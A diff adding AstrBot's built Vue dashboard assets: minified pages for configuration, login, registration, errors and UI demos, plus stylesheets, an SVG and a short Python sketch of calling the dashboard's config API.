addons/dashboard/dist/assets/ConfigPage-164b73e7.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as y}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as h,o,c as u,w as t,a,a8 as b,b as c,K as x,e as f,t as g,G as V,A as w,L as S,a9 as $,J as B,s as _,d as v,F as d,u as p,f as G,V as T,aa as j,T as l}from"./index-dc96e1be.js";import{_ as m}from"./ConfigDetailCard-8467c848.js";const D={class:"d-sm-flex align-center justify-space-between"},C=h({__name:"ConfigGroupCard",props:{title:String},setup(e){const s=e;return(i,n)=>(o(),u(B,{variant:"outlined",elevation:"0",class:"withbg",style:{width:"50%"}},{default:t(()=>[a(b,{style:{padding:"10px 20px"}},{default:t(()=>[c("div",D,[a(x,null,{default:t(()=>[f(g(s.title),1)]),_:1}),a(V)])]),_:1}),a(w),a(S,null,{default:t(()=>[$(i.$slots,"default")]),_:3})]),_:3}))}}),I={style:{display:"flex","flex-direction":"row","justify-content":"space-between","align-items":"center","margin-bottom":"12px"}},N={style:{display:"flex","flex-direction":"row"}},R={style:{"margin-right":"10px",color:"black"}},F={style:{color:"#222"}},k=h({__name:"ConfigGroupItem",props:{title:String,desc:String,btnRoute:String,namespace:String},setup(e){const s=e;return(i,n)=>(o(),_("div",I,[c("div",N,[c("h3",R,g(s.title),1),c("p",F,g(s.desc),1)]),a(v,{to:s.btnRoute,color:"primary",class:"ml-2",style:{"border-radius":"10px"}},{default:t(()=>[f("配置")]),_:1},8,["to"])]))}}),L={style:{display:"flex","flex-direction":"row",padding:"16px",gap:"16px",width:"100%"}},P={name:"ConfigPage",components:{UiParentCard:y,ConfigGroupCard:C,ConfigGroupItem:k,ConfigDetailCard:m},data(){return{config_data:[],config_base:[],save_message_snack:!1,save_message:"",save_message_success:"",config_outline:[],namespace:""}},mounted(){this.getConfig()},methods:{switchConfig(e){l.get("/api/configs?namespace="+e).then(s=>{this.namespace=e,this.config_data=s.data.data,console.log(this.config_data)}).catch(s=>{save_message=s,save_message_snack=!0,save_message_success="error"})},getConfig(){l.get("/api/config_outline").then(e=>{this.config_outline=e.data.data,console.log(this.config_outline)}).catch(e=>{save_message=e,save_message_snack=!0,save_message_success="error"}),l.get("/api/configs").then(e=>{this.config_base=e.data.data,console.log(this.config_data)}).catch(e=>{save_message=e,save_message_snack=!0,save_message_success="error"})},updateConfig(){l.post("/api/configs",{base_config:this.config_base,config:this.config_data,namespace:this.namespace}).then(e=>{e.data.status==="success"?(this.save_message=e.data.message,this.save_message_snack=!0,this.save_message_success="success"):(this.save_message=e.data.message,this.save_message_snack=!0,this.save_message_success="error")}).catch(e=>{this.save_message=e,this.save_message_snack=!0,this.save_message_success="error"})}}},J=Object.assign(P,{setup(e){return(s,i)=>(o(),_(d,null,[a(T,null,{default:t(()=>[c("div",L,[(o(!0),_(d,null,p(s.config_outline,n=>(o(),u(C,{key:n.name,title:n.name},{default:t(()=>[(o(!0),_(d,null,p(n.body,r=>(o(),u(k,{title:r.title,desc:r.desc,namespace:r.namespace,onClick:U=>s.switchConfig(r.namespace)},null,8,["title","desc","namespace","onClick"]))),256))]),_:2},1032,["title"]))),128))]),a(G,{cols:"12",md:"12"},{default:t(()=>[a(m,{config:s.config_data},null,8,["config"]),a(m,{config:s.config_base},null,8,["config"])]),_:1})]),_:1}),a(v,{icon:"mdi-content-save",size:"x-large",style:{position:"fixed",right:"52px",bottom:"52px"},color:"darkprimary",onClick:s.updateConfig},null,8,["onClick"]),a(j,{timeout:2e3,elevation:"24",color:s.save_message_success,modelValue:s.save_message_snack,"onUpdate:modelValue":
i[0]||(i[0]=n=>s.save_message_snack=n)},{default:t(()=>[f(g(s.save_message),1)]),_:1},8,["color","modelValue"])],64))}});export{J as default};
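The minified `ConfigPage` bundle above is the dashboard view that reads and writes the bot configuration over the panel's HTTP API: it GETs `/api/config_outline` and `/api/configs?namespace=...`, and saves with a POST to `/api/configs` carrying `base_config`, `config`, and `namespace`. A rough Python sketch of the same calls; the base URL and namespace are placeholders, and authentication (if any) is omitted:

```python
# Illustrative only: the endpoint paths come from the ConfigPage bundle above;
# the base URL and the "namespace" value are placeholders.
import requests

BASE = "http://127.0.0.1:6185"  # placeholder dashboard address

outline = requests.get(f"{BASE}/api/config_outline").json()["data"]
configs = requests.get(f"{BASE}/api/configs", params={"namespace": "example"}).json()["data"]

# Mirror the POST body the dashboard sends when saving.
resp = requests.post(f"{BASE}/api/configs", json={
    "base_config": [],        # placeholder: edited base config items
    "config": configs,        # placeholder: edited namespaced config items
    "namespace": "example",   # placeholder namespace
}).json()
print(resp.get("status"), resp.get("message"))
```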
11
addons/dashboard/dist/assets/ConsolePage-2b75b85a.js
vendored
Normal file
32
addons/dashboard/dist/assets/ConsolePage-ff373be6.css
vendored
Normal file
@@ -0,0 +1,32 @@
/**
 * Copyright (c) 2014 The xterm.js authors. All rights reserved.
 * Copyright (c) 2012-2013, Christopher Jeffrey (MIT License)
 * https://github.com/chjj/term.js
 * @license MIT
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 *
 * Originally forked from (with the author's permission):
 *   Fabrice Bellard's javascript vt100 for jslinux:
 *   http://bellard.org/jslinux/
 *   Copyright (c) 2011 Fabrice Bellard
 *   The original design remains. The terminal itself
 *   has been extended to include xterm CSI codes, among
 *   other features.
*/.xterm{cursor:text;position:relative;user-select:none;-ms-user-select:none;-webkit-user-select:none}.xterm.focus,.xterm:focus{outline:none}.xterm .xterm-helpers{position:absolute;top:0;z-index:5}.xterm .xterm-helper-textarea{padding:0;border:0;margin:0;position:absolute;opacity:0;left:-9999em;top:0;width:0;height:0;z-index:-5;white-space:nowrap;overflow:hidden;resize:none}.xterm .composition-view{background:#000;color:#fff;display:none;position:absolute;white-space:nowrap;z-index:1}.xterm .composition-view.active{display:block}.xterm .xterm-viewport{background-color:#000;overflow-y:scroll;cursor:default;position:absolute;right:0;left:0;top:0;bottom:0}.xterm .xterm-screen{position:relative}.xterm .xterm-screen canvas{position:absolute;left:0;top:0}.xterm .xterm-scroll-area{visibility:hidden}.xterm-char-measure-element{display:inline-block;visibility:hidden;position:absolute;top:0;left:-9999em;line-height:normal}.xterm.enable-mouse-events{cursor:default}.xterm.xterm-cursor-pointer,.xterm .xterm-cursor-pointer{cursor:pointer}.xterm.column-select.focus{cursor:crosshair}.xterm .xterm-accessibility,.xterm .xterm-message{position:absolute;left:0;top:0;bottom:0;right:0;z-index:10;color:transparent;pointer-events:none}.xterm .live-region{position:absolute;left:-9999px;width:1px;height:1px;overflow:hidden}.xterm-dim{opacity:1!important}.xterm-underline-1{text-decoration:underline}.xterm-underline-2{text-decoration:double underline}.xterm-underline-3{text-decoration:wavy underline}.xterm-underline-4{text-decoration:dotted underline}.xterm-underline-5{text-decoration:dashed underline}.xterm-overline{text-decoration:overline}.xterm-overline.xterm-underline-1{text-decoration:overline underline}.xterm-overline.xterm-underline-2{text-decoration:overline double underline}.xterm-overline.xterm-underline-3{text-decoration:overline wavy underline}.xterm-overline.xterm-underline-4{text-decoration:overline dotted underline}.xterm-overline.xterm-underline-5{text-decoration:overline dashed underline}.xterm-strikethrough{text-decoration:line-through}.xterm-screen .xterm-decoration-container .xterm-decoration{z-index:6;position:absolute}.xterm-screen .xterm-decoration-container .xterm-decoration.xterm-decoration-top-layer{z-index:7}.xterm-decoration-overview-ruler{z-index:8;position:absolute;top:0;right:0;pointer-events:none}.xterm-decoration-top{z-index:2;position:relative}
1
addons/dashboard/dist/assets/DefaultDashboard-8752691b.js
vendored
Normal file
1
addons/dashboard/dist/assets/Error404Page-06f6396d.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as t}from"./_plugin-vue_export-helper-c27b6911.js";import{o,c,w as s,V as i,a as r,b as e,d as l,e as a,f as d}from"./index-dc96e1be.js";const n="/assets/img-error-bg-ab6474a0.svg",_="/assets/img-error-blue-2675a7a9.svg",m="/assets/img-error-text-a6aebfa0.svg",g="/assets/img-error-purple-edee3fbc.svg";const p={},u={class:"text-center"},f=e("div",{class:"CardMediaWrapper"},[e("img",{src:n,alt:"grid",class:"w-100"}),e("img",{src:_,alt:"grid",class:"CardMediaParts"}),e("img",{src:m,alt:"build",class:"CardMediaBuild"}),e("img",{src:g,alt:"build",class:"CardMediaBuild"})],-1),h=e("h1",{class:"text-h1"},"Something is wrong",-1),v=e("p",null,[e("small",null,[a("The page you are looking was moved, removed, "),e("br"),a("renamed, or might never exist! ")])],-1);function x(b,V){return o(),c(i,{"no-gutters":"",class:"h-100vh"},{default:s(()=>[r(d,{class:"d-flex align-center justify-center"},{default:s(()=>[e("div",u,[f,h,v,r(l,{variant:"flat",color:"primary",class:"mt-4",to:"/","prepend-icon":"mdi-home"},{default:s(()=>[a(" Home")]),_:1})])]),_:1})]),_:1})}const C=t(p,[["render",x]]);export{C as default};
1
addons/dashboard/dist/assets/Error404Page-11cf087a.css
vendored
Normal file
@@ -0,0 +1 @@
.CardMediaWrapper{max-width:720px;margin:0 auto;position:relative}.CardMediaBuild{position:absolute;top:0;left:0;width:100%;animation:5s bounce ease-in-out infinite}.CardMediaParts{position:absolute;top:0;left:0;width:100%;animation:10s blink ease-in-out infinite}
1
addons/dashboard/dist/assets/ExtensionPage-9b03c00a.js
vendored
Normal file
1
addons/dashboard/dist/assets/FullLayout-58c19404.js
vendored
Normal file
5
addons/dashboard/dist/assets/LoginPage-71a6cb60.js
vendored
Normal file
1
addons/dashboard/dist/assets/LoginPage-74e85ca7.css
vendored
Normal file
@@ -0,0 +1 @@
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginForm .v-text-field .v-field--active input{font-weight:500}.loginBox{max-width:475px;margin:0 auto}
1
addons/dashboard/dist/assets/LogoDark.vue_vue_type_script_setup_true_lang-7df35c25.js
vendored
Normal file
@@ -0,0 +1 @@
import{av as _,x as d,D as n,o as c,s as m,a as f,w as p,Q as r,b as a,R as o,B as t,aw as h}from"./index-dc96e1be.js";const s={Sidebar_drawer:!0,Customizer_drawer:!1,mini_sidebar:!1,fontTheme:"Roboto",inputBg:!1},l=_({id:"customizer",state:()=>({Sidebar_drawer:s.Sidebar_drawer,Customizer_drawer:s.Customizer_drawer,mini_sidebar:s.mini_sidebar,fontTheme:"Poppins",inputBg:s.inputBg}),getters:{},actions:{SET_SIDEBAR_DRAWER(){this.Sidebar_drawer=!this.Sidebar_drawer},SET_MINI_SIDEBAR(e){this.mini_sidebar=e},SET_FONT(e){this.fontTheme=e}}}),u={class:"logo",style:{display:"flex","align-items":"center"}},b={style:{"font-size":"24px","font-weight":"1000"}},w={style:{"font-size":"20px","font-weight":"1000"}},S={style:{"font-size":"20px"}},z=d({__name:"LogoDark",setup(e){n("rgb(var(--v-theme-primary))"),n("rgb(var(--v-theme-secondary))");const i=l();return(g,B)=>(c(),m("div",u,[f(t(h),{to:"/",style:{"text-decoration":"none",color:"black"}},{default:p(()=>[r(a("span",b,"AstrBot 仪表盘",512),[[o,!t(i).mini_sidebar]]),r(a("span",w,"Astr",512),[[o,t(i).mini_sidebar]]),r(a("span",S,"Bot",512),[[o,t(i).mini_sidebar]])]),_:1})]))}});export{z as _,l as u};
1
addons/dashboard/dist/assets/MaterialIcons-fc2671ff.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as i}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as n,D as a,o as c,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-dc96e1be.js";const p=["innerHTML"],v=n({__name:"MaterialIcons",setup(b){const s=a({title:"Material Icons"}),r=a('<iframe src="https://materialdesignicons.com/" frameborder="0" width="100%" height="1000"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Material Icons",disabled:!0,href:"#"}]);return(h,M)=>(c(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(i,{title:"Material Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,p)]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
1
addons/dashboard/dist/assets/RegisterPage-03654257.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as B}from"./LogoDark.vue_vue_type_script_setup_true_lang-7df35c25.js";import{x as y,D as o,o as b,s as U,a as e,w as a,b as n,B as $,d as u,f as d,A as _,e as f,V as r,O as m,ap as A,au as E,F,c as T,N as q,J as V,L as P}from"./index-dc96e1be.js";const z="/assets/social-google-a359a253.svg",N=["src"],S=n("span",{class:"ml-2"},"Sign up with Google",-1),D=n("h5",{class:"text-h5 text-center my-4 mb-8"},"Sign up with Email address",-1),G={class:"d-sm-inline-flex align-center mt-2 mb-7 mb-sm-0 font-weight-bold"},L=n("a",{href:"#",class:"ml-1 text-lightText"},"Terms and Condition",-1),O={class:"mt-5 text-right"},j=y({__name:"AuthRegister",setup(w){const c=o(!1),i=o(!1),p=o(""),v=o(""),g=o(),h=o(""),x=o(""),k=o([s=>!!s||"Password is required",s=>s&&s.length<=10||"Password must be less than 10 characters"]),C=o([s=>!!s||"E-mail is required",s=>/.+@.+\..+/.test(s)||"E-mail must be valid"]);function R(){g.value.validate()}return(s,l)=>(b(),U(F,null,[e(u,{block:"",color:"primary",variant:"outlined",class:"text-lightText googleBtn"},{default:a(()=>[n("img",{src:$(z),alt:"google"},null,8,N),S]),_:1}),e(r,null,{default:a(()=>[e(d,{class:"d-flex align-center"},{default:a(()=>[e(_,{class:"custom-devider"}),e(u,{variant:"outlined",class:"orbtn",rounded:"md",size:"small"},{default:a(()=>[f("OR")]),_:1}),e(_,{class:"custom-devider"})]),_:1})]),_:1}),D,e(E,{ref_key:"Regform",ref:g,"lazy-validation":"",action:"/dashboards/analytical",class:"mt-7 loginForm"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:h.value,"onUpdate:modelValue":l[0]||(l[0]=t=>h.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Firstname"},null,8,["modelValue"])]),_:1}),e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:x.value,"onUpdate:modelValue":l[1]||(l[1]=t=>x.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Lastname"},null,8,["modelValue"])]),_:1})]),_:1}),e(m,{modelValue:v.value,"onUpdate:modelValue":l[2]||(l[2]=t=>v.value=t),rules:C.value,label:"Email Address / Username",class:"mt-4 mb-4",required:"",density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary"},null,8,["modelValue","rules"]),e(m,{modelValue:p.value,"onUpdate:modelValue":l[3]||(l[3]=t=>p.value=t),rules:k.value,label:"Password",required:"",density:"comfortable",variant:"outlined",color:"primary","hide-details":"auto","append-icon":i.value?"mdi-eye":"mdi-eye-off",type:i.value?"text":"password","onClick:append":l[4]||(l[4]=t=>i.value=!i.value),class:"pwdInput"},null,8,["modelValue","rules","append-icon","type"]),n("div",G,[e(A,{modelValue:c.value,"onUpdate:modelValue":l[5]||(l[5]=t=>c.value=t),rules:[t=>!!t||"You must agree to continue!"],label:"Agree with?",required:"",color:"primary",class:"ms-n2","hide-details":""},null,8,["modelValue","rules"]),L]),e(u,{color:"secondary",block:"",class:"mt-2",variant:"flat",size:"large",onClick:l[6]||(l[6]=t=>R())},{default:a(()=>[f("Sign Up")]),_:1})]),_:1},512),n("div",O,[e(_),e(u,{variant:"plain",to:"/auth/login",class:"mt-2 text-capitalize mr-n2"},{default:a(()=>[f("Already have an account?")]),_:1})])],64))}});const I={class:"pa-7 pa-sm-12"},J=n("h2",{class:"text-secondary text-h2 mt-8"},"Sign up",-1),Y=n("h4",{class:"text-disabled text-h4 mt-3"},"Enter credentials to continue",-1),M=y({__name:"RegisterPage",setup(w){return(c,i)=>(b(),T(r,{class:"h-100vh","no-gutters":""},{default:a(()=>[e(d,{cols:"12",class:"d-flex align-center 
bg-lightprimary"},{default:a(()=>[e(q,null,{default:a(()=>[n("div",I,[e(r,{justify:"center"},{default:a(()=>[e(d,{cols:"12",lg:"10",xl:"6",md:"7"},{default:a(()=>[e(V,{elevation:"0",class:"loginBox"},{default:a(()=>[e(V,{variant:"outlined"},{default:a(()=>[e(P,{class:"pa-9"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",class:"text-center"},{default:a(()=>[e(B),J,Y]),_:1})]),_:1}),e(j)]),_:1})]),_:1})]),_:1})]),_:1})]),_:1})])]),_:1})]),_:1})]),_:1}))}});export{M as default};
1
addons/dashboard/dist/assets/RegisterPage-799ed804.css
vendored
Normal file
@@ -0,0 +1 @@
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginBox{max-width:475px;margin:0 auto}
1
addons/dashboard/dist/assets/ShadowPage-fb617452.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as c}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as f}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as m,D as s,o as l,s as r,a as e,w as a,f as i,V as o,F as d,u as _,J as p,X as b,b as h,t as g}from"./index-dc96e1be.js";const v=m({__name:"ShadowPage",setup(w){const n=s({title:"Shadow Page"}),u=s([{title:"Utilities",disabled:!1,href:"#"},{title:"Shadow",disabled:!0,href:"#"}]);return(V,x)=>(l(),r(d,null,[e(c,{title:n.value.title,breadcrumbs:u.value},null,8,["title","breadcrumbs"]),e(o,null,{default:a(()=>[e(i,{cols:"12",md:"12"},{default:a(()=>[e(f,{title:"Basic Shadow"},{default:a(()=>[e(o,{justify:"center"},{default:a(()=>[(l(),r(d,null,_(25,t=>e(i,{key:t,cols:"auto"},{default:a(()=>[e(p,{height:"100",width:"100",class:b(["mb-5",["d-flex justify-center align-center bg-primary",`elevation-${t}`]])},{default:a(()=>[h("div",null,g(t-1),1)]),_:2},1032,["class"])]),_:2},1024)),64))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
1
addons/dashboard/dist/assets/TablerIcons-3ae5dd43.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as n}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as c,D as a,o as i,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-dc96e1be.js";const b=["innerHTML"],w=c({__name:"TablerIcons",setup(p){const s=a({title:"Tabler Icons"}),r=a('<iframe src="https://tablericons.com/" frameborder="0" width="100%" height="600"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Tabler Icons",disabled:!0,href:"#"}]);return(h,T)=>(i(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(n,{title:"Tabler Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,b)]),_:1})]),_:1})]),_:1})],64))}});export{w as default};
1
addons/dashboard/dist/assets/TypographyPage-7d559339.js
vendored
Normal file
@@ -0,0 +1 @@
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as v}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as f,o as i,c as g,w as e,a,a8 as y,K as b,e as w,t as d,A as C,L as V,a9 as L,J as _,D as o,s as h,f as k,b as t,F as x,u as B,X as H,V as T}from"./index-dc96e1be.js";const s=f({__name:"UiChildCard",props:{title:String},setup(r){const l=r;return(n,c)=>(i(),g(_,{variant:"outlined"},{default:e(()=>[a(y,{class:"py-3"},{default:e(()=>[a(b,{class:"text-h5"},{default:e(()=>[w(d(l.title),1)]),_:1})]),_:1}),a(C),a(V,null,{default:e(()=>[L(n.$slots,"default")]),_:3})]),_:3}))}}),D={class:"d-flex flex-column gap-1"},S={class:"text-caption pa-2 bg-lightprimary"},z=t("div",{class:"text-grey"},"Class",-1),N={class:"font-weight-medium"},$=t("div",null,[t("p",{class:"text-left"},"Left aligned on all viewport sizes."),t("p",{class:"text-center"},"Center aligned on all viewport sizes."),t("p",{class:"text-right"},"Right aligned on all viewport sizes."),t("p",{class:"text-sm-left"},"Left aligned on viewports SM (small) or wider."),t("p",{class:"text-right text-md-left"},"Left aligned on viewports MD (medium) or wider."),t("p",{class:"text-right text-lg-left"},"Left aligned on viewports LG (large) or wider."),t("p",{class:"text-right text-xl-left"},"Left aligned on viewports XL (extra-large) or wider.")],-1),M=t("div",{class:"d-flex justify-space-between flex-row"},[t("a",{href:"#",class:"text-decoration-none"},"Non-underlined link"),t("div",{class:"text-decoration-line-through"},"Line-through text"),t("div",{class:"text-decoration-overline"},"Overline text"),t("div",{class:"text-decoration-underline"},"Underline text")],-1),O=t("div",null,[t("p",{class:"text-high-emphasis"},"High-emphasis has an opacity of 87% in light theme and 100% in dark."),t("p",{class:"text-medium-emphasis"},"Medium-emphasis text and hint text have opacities of 60% in light theme and 70% in dark."),t("p",{class:"text-disabled"},"Disabled text has an opacity of 38% in light theme and 50% in dark.")],-1),j=f({__name:"TypographyPage",setup(r){const l=o({title:"Typography Page"}),n=o([["Heading 1","text-h1"],["Heading 2","text-h2"],["Heading 3","text-h3"],["Heading 4","text-h4"],["Heading 5","text-h5"],["Heading 6","text-h6"],["Subtitle 1","text-subtitle-1"],["Subtitle 2","text-subtitle-2"],["Body 1","text-body-1"],["Body 2","text-body-2"],["Button","text-button"],["Caption","text-caption"],["Overline","text-overline"]]),c=o([{title:"Utilities",disabled:!1,href:"#"},{title:"Typography",disabled:!0,href:"#"}]);return(U,F)=>(i(),h(x,null,[a(m,{title:l.value.title,breadcrumbs:c.value},null,8,["title","breadcrumbs"]),a(T,null,{default:e(()=>[a(k,{cols:"12",md:"12"},{default:e(()=>[a(v,{title:"Basic Typography"},{default:e(()=>[a(s,{title:"Heading"},{default:e(()=>[t("div",D,[(i(!0),h(x,null,B(n.value,([p,u])=>(i(),g(_,{variant:"outlined",key:p,class:"my-4"},{default:e(()=>[t("div",{class:H([u,"pa-2"])},d(p),3),t("div",S,[z,t("div",N,d(u),1)])]),_:2},1024))),128))])]),_:1}),a(s,{title:"Text-alignment",class:"mt-8"},{default:e(()=>[$]),_:1}),a(s,{title:"Decoration",class:"mt-8"},{default:e(()=>[M]),_:1}),a(s,{title:"Opacity",class:"mt-8"},{default:e(()=>[O]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{j as default};
1
addons/dashboard/dist/assets/UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js
vendored
Normal file
@@ -0,0 +1 @@
import{x as n,o,c as i,w as e,a,a8 as d,b as c,K as u,e as p,t as _,a9 as s,A as f,L as V,J as m}from"./index-dc96e1be.js";const C={class:"d-sm-flex align-center justify-space-between"},h=n({__name:"UiParentCard",props:{title:String},setup(l){const r=l;return(t,x)=>(o(),i(m,{variant:"outlined",elevation:"0",class:"withbg"},{default:e(()=>[a(d,null,{default:e(()=>[c("div",C,[a(u,null,{default:e(()=>[p(_(r.title),1)]),_:1}),s(t.$slots,"action")])]),_:3}),a(f),a(V,null,{default:e(()=>[s(t.$slots,"default")]),_:3})]),_:3}))}});export{h as _};
1
addons/dashboard/dist/assets/_plugin-vue_export-helper-c27b6911.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
const s=(t,r)=>{const o=t.__vccOpts||t;for(const[c,e]of r)o[c]=e;return o};export{s as _};
34  addons/dashboard/dist/assets/img-error-bg-ab6474a0.svg  vendored  Normal file
@@ -0,0 +1,34 @@
|
||||
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<g opacity="0.09">
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 4.49127 197.53)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 342.315 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 28.0057 211.105)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 365.829 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 51.52 224.68)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 389.344 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 75.0345 238.255)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 412.858 346.852)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 98.5488 251.83)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 436.372 333.277)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 122.063 265.405)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 459.887 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 145.578 278.979)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 483.401 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 169.092 292.556)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 506.916 292.551)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 192.597 306.127)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 530.43 278.977)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 216.111 319.703)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 553.944 265.402)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 239.626 333.277)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 577.459 251.827)" stroke="black"/>
|
||||
<path d="M263.231 346.905L601.064 151.871" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 600.973 238.252)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 286.654 360.428)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 624.487 224.677)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 310.169 374.002)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 648.002 211.102)" stroke="black"/>
|
||||
